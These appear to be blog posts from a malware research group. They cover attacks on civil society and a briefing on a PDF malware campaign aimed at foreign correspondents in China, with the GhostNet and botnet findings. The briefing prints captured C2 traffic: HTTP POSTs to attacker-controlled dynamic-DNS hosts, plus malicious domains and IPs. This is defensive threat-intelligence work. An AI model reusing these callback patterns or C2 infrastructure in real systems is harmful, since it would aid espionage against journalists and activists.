“0day”: Civil Society and Cyber Security



Greg and I have put up a new post on the IWM and Malware Lab about 0day exploits and Civil Society organizations. It s not about coordinated 0day attacks but rather some general trends and patterns that we’re seeing. We’re finding that the websites of civil society organizations are being used to push malware — usually through iframe injection — and that malware campaigns often leverage human rights related themes. Also, despite the fact that some attacks may be unintentional (e.g. mass iframe injection), it results in a situation in which civil society organizations are intimidated and their operations are disrupted. The key issues we identified are:

  • Civil society organizations are compromised and used as vehicles to deliver 0day exploits
  • Attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available
  • Attackers leverage human rights issues as the context for malware distribution
  • The attacks are effective; civil society organizations continue to propagate malicious links within their communities without realizing it.

Hossein Derakhshan



Cyrus Farivar has posted a translation of a letter sent by Hossein’s father to Ayatollah Larijani. It has been almost a year since Hossein was arrested and still there have been no charges laid against him, his family has only been able to meet with him twice for a few minutes and they don’t know which institution is holding him.

GhostNet in Portugal



A new report from www.trusted.pt documents their investigation into GhostNet in Portugal. I’ve only been able to read it via Google translate but it seems very interesting. During the GhostNet investigation we found several Portuguese infections including:

  • Embassy of Portugal, Germany
  • Embassy of Portugal, France
  • Embassy of Portugal, Finland
  • CEGER, Management Center for the Electronic Government Network, Portugal

The trusted.pt investigated further and found two control servers and access the attacker’s admin interface:

In September 2009 it had full access to the two administration interfaces of “GhostNet, one on each controller. The administration interface is an application in php, rather crude but effective, at home we can see all computers that have taken place in these drivers, in this case were 730, from 67 countries The interface allows complete control over the infected machine. Through something like “modules” can be added to the infected machines new features such as keyloggers, trojans remote control in real time ( “GhostRAT”), execute remote commands, send and receive files, and view the files sent automatically by computers infected.

This is exactly what we found. However, trusted.pt was able to view the documents pilfered from the infected machines and provided this summary:

It was investigated and found to exist in “GhostNet” of 1.1 gigabytes of information from computers with IP addresses associated with the Ministry of Foreign Affairs – An. Pst Ambassador of Portugal in India – JPEG procedures for employees, including passage of visas was searched and found the existence of the “GhostNet” of 7.9 gigabytes of information from computers with IP addresses associated with the Ministry of Justice:

- Multiple files. pst ITIJ employees with diverse and sensitive.
- Documents describing the procedures, configurations, and topologies of the main services of the ministry of justice, including passwords (modules keylogger) for remote access to servers.
- Documents relating to the electoral process, action plans and contingency plans, descriptions of settings and network topology election, including any data source from the civilian governments, passwords, configuration of routers, switches and other equipment.
- Various. Pst files and passwords for employees of the Directorate General of Registration and Notary, which allow a total view of how the services work, including conservatories of civil status and property. Passwords for access to the applications used.
- In the Judiciary Police, including working procedures – Several technical information for the computer systems of courts and their applications (SITAF, habilus).
- Several files of cases that we think have been removed from computers officials or judges – Documents relating to the prosecutor.
- Computer Applications as Habilus.

In fact and in view of the files found concrete strip to the frightening conclusion that the spying by “GhostNet in Portugal was able to reach key bodies of the Portuguese as the courts, and there (and there?) A serious infection in various organisms containing valuable and sensitive information that should in theory is well protected. An attempt was made during the time it gained access to the two drivers “GhostNet” beyond the operating system hosting the interface, but you do not find any fault in it that we can make the most important information about the reasons and people behind this network of highly dangerous espionage, and our access was lost about 72 hours after first contact.

Very interesting stuff.

Russian Botnet Readme.txt



A recent Malware Lab investigation I’ve been working on led me to two interesting files on a Russian botnet:

I don’t know if these are well known or not, but they describe how to install the botnet backend as well as what’s been added between version 1.0 to 6.0.

Here are the executables that were on the same server:

8.exe

http://www.virustotal.com/analisis/d32c1247b9cc80db7c50bd0b91d3a4d523672e9c238f99e1972b75d04340ab88-1255645683

http://www.threatexpert.com/report.aspx?md5=0d431ffb676be2c091eda0445282b59e

R23.exe

http://www.virustotal.com/analisis/46841255cd4e91cf93c74c539c13cf57beea6ec33c0c6502c2d14fb7182ce7ef-1255651763

http://www.threatexpert.com/report.aspx?md5=6de4aeaca08b57339e2890a35c84a968

R31.exe

http://www.virustotal.com/analisis/8e0df4b3e31afd1e73d68bdf7bb3f35c61d9d12cf35c0d36a8b0d98459b88b40-1255645829

http://www.threatexpert.com/report.aspx?md5=4672d5000ea2ed47ff7089666bf18186

Windows_Protector.exe

http://www.virustotal.com/analisis/23f064ca6f2c661899a0e227735b993c05186cfdc1abdc0c9e884661159d97a9-1255652491

http://www.threatexpert.com/report.aspx?md5=43ec3ee7742dc809dc2690508b111ddf

Targeted Malware Attack on Foreign Correspondent’s based in China



By Nart Villeneuve and Greg Walton

Overview

There have been recent reports of malware attacks on journalists based in China. The attacks specifically targeted Chinese employees working for media organizations, including Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa.1 These employees received an email from “Pam ” who claimed to be an editor with the Straits Times, that came with a PDF attachment that contains malware. When opened, malicious code in the PDF exploits the Adobe Reader program and drops the malware on the target’s computer.

These attacks correlate with reports of increased security measures within China as a result of the 60th anniversary of the founding of the People’s Republic of China.2 These increased security measures have also been extended to the Internet, with providers of anti-censorship technology reporting increased levels of blocking that prevents people from accessing the web sites of foreign media and news organizations.3

This short briefing from the Malware Lab and the Information Warfare Monitor analyzes a sample from one of the attacks on behalf of an international news agency that operates in China, and a member of the Foreign Correspondents Club in Beijing.4

Key Findings:

  • The content of the email, and the accompanying malicious attachment, are in well written English and contain accurate information. The email details a reporter’s proposed trip to China to write a story on China’s place in the global economy; all the contacts in the malicious attachment are real people that are knowledgeable about or have a professional interest in China’s economy.
  • The domain names used as “command & control” servers for the malware have been used in previous targeted attacks dating back to 2007. The malware domain names, as in previously documented cases, only resolve to real IP addresses for short periods of time.
  • The malware exploits vulnerabilities in the Adobe PDF Reader, and its behaviour matches that of malware used in previous attacks dating back to 2008. This malware was found on computers at the Offices of Tibet in London, and has used political themes in malware attachments in the past.
  • The IP addresses currently used by the malware are assigned to Taiwan. One of the servers is located at the National Central University of Taiwan, and is a server to which students and faculty connect to download anti-virus software. The second is an IP address assigned to the Taiwan Academic Network. These compromised servers present a severe security problem as the attackers may have substituted their malware for anti-virus software used by students, employees, and faculty at the National Central University.
The Pam Bourdon Email

The Pam Bourdon Email

Analysis

The email sent to the foreign correspondents from “Pam ” appears to be customized and targeted. The context of the letter and the attached PDF, “Interview list.pdf” is specific to journalists. The email itself is focused on setting up meetings for journalists in China, and the attached PDF contains a list of genuine contacts in China that relate to the context of the email. The name of the hotel and its address are accurate. Moreover, the purpose for the trip to China, to research the “annual economic survey,” correlates with the World Economic Forum’s release of its “Global Competitiveness Report” on September 8, 2009 and the conference that followed in Dalian, China on September 10-12, 2009.5

The PDF contains malicious code that exploits Adobe Acrobat and drops malware on the target’s computer. Only 3 of 41 anti-virus products used by Virus Total detected the malicious code embedded in the PDF.6

The Pam Bourdon Attachment

The Pam Bourdon Attachment

When opened, the PDF displays a list of contacts. The contacts listed in the PDF appear to be genuine. All the names and titles in the document are accurate. However, some appear to be former positions held by the individuals, indicating that the document is somewhat dated. It is possible that this document is a legitimate document stolen from a compromised machine, modified to include malware, and used as a lure to entice people to open the malicious attachment.

After opening the attachment, malware is silently dropped on the target’s computer.

The malware attempts DNS resolution for three domains: mail.amberice.com, menberservice.3322.org, and zwy2007.pc-officer.com. Often the domain names will not resolve to proper IP addresses; other times they will resolve only for a short period of time. In this case, two of the domain names eventually resolved:

menberservice.3322.org | 140.115.182.230
zwy2007.pc-officer.com | 210.240.85.250

The domain name zwy2007.pc-officer.com resolves to 210.240.85.250 which is an IP address assigned to the Taiwan Academic Network, Ministry of Education Computer Center. The malware was unable to make successful connections to this IP address.

However, the domain name “pc-officer.com” is a well known malware domain name that has been used in previous attacks. In 2007, Maarten Van Horenbeeck investigated cases of targeted attacks that used a “petition to the International Olympic Committee on Chinese human rights violations” as the theme.7 In those cases, the malware attempted to connect to:

ihe1979.3322.org
ding.pc-officer.com | 61.219.152.125

The same DNS techniques were used – the domain names only resolved to real IP addresses for a short period of time.

A similar case was investigated by F-Secure earlier this year.8 In that case, the domain names that the malware attempted to connect to were:

ihe1979.3322.org
feng.pc-officer.com | 216.255.196.154
feng.pc-officer.com | 211.234.122.84

The same DNS techniques were used – the domain names only resolved to real IP addresses for a short period of time.

The domain menberservice.3322.org eventually resolved to 140.115.182.230, which reverse resolves to avirus.is.ncu.edu.tw. This location (https://avirus.is.ncu.edu.tw:4343/officescan/console/html/ClientInstall/) is at the National Central University of Taiwan, and it is used by students and faculty to download anti-virus software.9 This is potentially a severe security problem, as the attackers may have substituted their malware for anti-virus software for use by students, employees, and faculty at the National Central University.

menberservice.3322.org | 140.115.182.230 | avirus.is.ncu.edu.tw

The malware connects to this location and begins sending and receiving information:

POST http://menberservice.3322.org:8000/LFDXFiRcVs3902.rar HTTP/1.1
User-Agent: Mozilla/4.2.20 (compatible; MSIE 5.0.2; Win32)
Host: menberservice.3322.org
Content-Length: 682
Proxy-Connection: keep-alive
Pragma: no-cache
.new_host_42

HTTP/1.1 200 OK
Date: Tue Sep 22 21:41:10 2009
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 32
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

The malware matches behaviour documented by ThreatExpert earlier this year.10 Documents with names such as “Urgent Appeal to Secretary Hillary Clinton.doc” and “Days with ITSN Tibet in My Eyes.doc” contained malware that connected to mmwbzhij.meibu.com on ports 8585 and 8686.

http://mmwbzhij.meibu.com:8686/[random characters].[random file extension]

where [random characters] string may look similar to:

* qRXycRXuwJ11749
* PqJNBkcPDm18630
* ZPDPyZkZcV23661

and [random file extension] can be any of the following: rm, mov, mp3, pdf.

This matches behaviour that the Information Warfare Monitor documented in the “Tracking GhostNet” report11 after analyzing a compromised computer at the Offices of Tibet in London, U.K. In that case, there were connections to oyd.3322.org which resolved to 58.141.132.66 on port 4501:

POST http://oyd.3322.org:4501/TkBXPPXkRL14509.pdf HTTP/1.1
User-Agent: Mozilla/4.8.20 (compawhichplatform.htmtible; MSIE 5.0.2; Win32)
Host: oyd.3322.org
Content-Length: 46
Proxy-Connection: keep-alive
Pragma: no-cache
new_host_24

HTTP/1.1 200 OK
Date: Wed Oct 01 23:05:15 2008
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 44
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

A follow-up visit to OOT-London found another malware infection connecting to mmwbzhij.meibu.com which resolved to 216.131.67.95 on port 8686:

POST http://mmwbzhij.meibu.com:8686/yDFDcVoFma29957.mp3 HTTP/1.1
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: mmwbzhij.meibu.com
Content-Length: 32
Proxy-Connection: keep-alive
Pragma: no-cache
.new_host_23

HTTP/1.1 200 OK
Date: Fri Apr 10 22:49:22 2009
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 32
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

The domain names 3322.org and meibu.com are dynamic DNS services that allow the attackers to map domain names to IP addresses they control. In these cases, the attackers are not required to register domain names. Attackers typically favour dynamic DNS services such as these.12 The attackers have pointed these domains to IP’s on the networks of Black Oak Computers Inc, CA, USA, and C&M Communication Co., Ltd., Korea, in addition to the Taiwan Academic Network.

The control servers on pc-officer.com have, in the past, resolved to IP addresses on One Eighty Networks, WA, USA, KIDC, Korea and HINET, Taiwan, in addition to the National Central University of Taiwan’s server where students and faculty download anti-virus software.

Attribution Issues

In general, determining attribution in these types of attacks is difficult. Analyzing domain registration and other contextual information can occasionally provide some useful leads.

The domain names pc-officer.com and amberice.com were registered in 2007 to “wei zheng” using the email address “sunny@hetu.cn” and the phone number “86-010-4564654.” There are some links between these data and the registration data in other domain names. For example, “wei zheng” also registered “fclinux.com” with the email address “asdfi@hotmail.com” and the phone number “86 10 13810358162.” This “wei zheng” also registered “winxpupdata.com” with the phone number “86 10 13810358162” with the email address “afsaf@hotmail.com.” A variety of domain names, such as ag365.com, are registered to “Hetu Time Networking Technology Ltd.” in the name of “lin long” with the email address “harry@hetu.cn.” However the technical contact is “lin hai” with the email address “sunny@hetu.cn.”

It is unclear what the connection is here as “hetu.cn” is a domain registrar and hosting company. It is possible that the information is not connected to the attackers, but others who have been compromised by the attackers.

There is another avenue of inquiry that impacts attribution. It is not clear how the email addresses of the recipients, who are local employees for foreign journalists, were acquired by the attackers.13 The Reuters news story about the targeted email attacks makes an important point about those who were targeted:

The “Pam Bourdon” emails on Monday targeted Chinese news assistants, whose names often do not appear on news reports and who must be hired through an agency that reports to the Foreign Ministry.14

Considering that the contact information of these assistants was not publicly known, but was known to China’s Foreign Ministry, an element of suspicion is raised concerning the involvement of the latter. However, there are alternative explanations for how the attackers were able to assemble the list of contacts. These attackers have been actively compromising targets since at least 2007, and likely compile lists of new targets from information acquired through previous exploits. In fact, the accuracy of the email used in this case, and the malicious attachment, suggest that the attackers leveraged information stolen from previously compromised computers.

There is no evidence that directly implicates the government of China in these attacks.

However, both the timing and targets of the attack do raise questions. With the 60th anniversary of the People’s Republic if China fast approaching, it is difficult to dismiss attacks on high profile media targets such as Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa as random events. These organizations were targeted directly, but the motivation of the attackers remains unknown. Furthermore, the use of compromised servers at the National Central University of Taiwan and the Taiwan Academic Network will no doubt add to an already tense relationship between China and Taiwan.

About IWM

The Information Warfare Monitor (www.infowar-monitor.net) is an advanced research activity tracking the emergence of cyberspace as a strategic domain. The IWM is public-private venture between two Canadian institutions: the Citizen Lab at the Munk Centre for International Studies, University of Toronto and The SecDev Group, an operational think tank based in Ottawa (Canada).

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The ML combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Notes

[1] See, http://www.fccchina.org/2009/09/21/warning-on-fake-emails-targeting-news-assistants/ and http://www.reuters.com/article/internetNews/idUSTRE58L0LJ20090922

[2] http://edition.cnn.com/2009/WORLD/asiapcf/09/21/china.national.day/

[3] http://www.pcworld.com/article/172627/china_clamps_down_on_internet_ahead_of_60th_anniversary.html , http://ifex.org/china/2009/09/23/censorship_and_cyber_attacks/

[4] This follows an investigation of the FCCC’s web server conducted last month. The FCCC’s WordPress installation was compromised and malicious “iframes” were inserted which loaded www.nontopworld.com/homepage.htm and www.nontopworld.com/mainpage.htm. The IP address for nontopworld.com (58.64.130.11) appears on a list of IP addresses linked to the Russian Business Network (RBN). http://doc.emergingthreats.net/pub/Main/RussianBusinessNetwork/RussianBusinessNetworkIPs.txt

[5] http://www.weforum.org/en/events/ArchivedEvents/AnnualMeetingoftheNewChampions2009/index.htm

[6] http://www.virustotal.com/analisis/dbcdddc779877d4ca2e30b6d21d407f661379155775ae39ec545984095ed07dd-1253586587

[7] http://isc.sans.org/diary.html?storyid=3400, http://www.daemon.be/maarten/Crouching_Powerpoint_Hidden_Trojan_24C3.pdf, http://www.daemon.be/maarten/targetedattacks.html, http://www.virustotal.com/analisis/755530853391444e729220443ce869e908f060c345b2c2aaac8b3cb5e6bffe7a-1190194670, http://www.virustotal.com/analisis/f5eaf65eefad528e6e46cb9c51ae3fb07b9f9b851a338235d787c963a47f80d6-1223527899, http://www.virustotal.com/analisis/d77f3145624c2ae20581265773d509d7ee9ad7e65ba187b891f777feb794ebfb-1190849733

[8] http://www.f-secure.com/weblog/archives/00001649.html and http://www.virustotal.com/analisis/cc15b6402c507364a41c32f8b4176670bc609259543523d42a865c2823b6dd2e-1238734246

[9] http://www.cc.ncu.edu.tw/Eng_faq/anti-virus.php

[10] http://blog.threatexpert.com/2009/02/politically-motivated-trojan.html, http://www.threatexpert.com/report.aspx?md5=02f2029647e85fff81620b2c333bc9cf and http://www.threatexpert.com/report.aspx?md5=7ce96a0ed4d71c26d2c377dd331e4466

[11] http://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network

[12] http://www.businessweek.com/magazine/content/08_16/b4080032218430_page_4.htm

[13] http://www.themalaysianinsider.com/index.php/world/38375-e-mail-viruses-target-foreign-media-in-china

[14] http://www.nytimes.com/reuters/2009/09/22/world/international-us-china-cyberattack.html?_r=1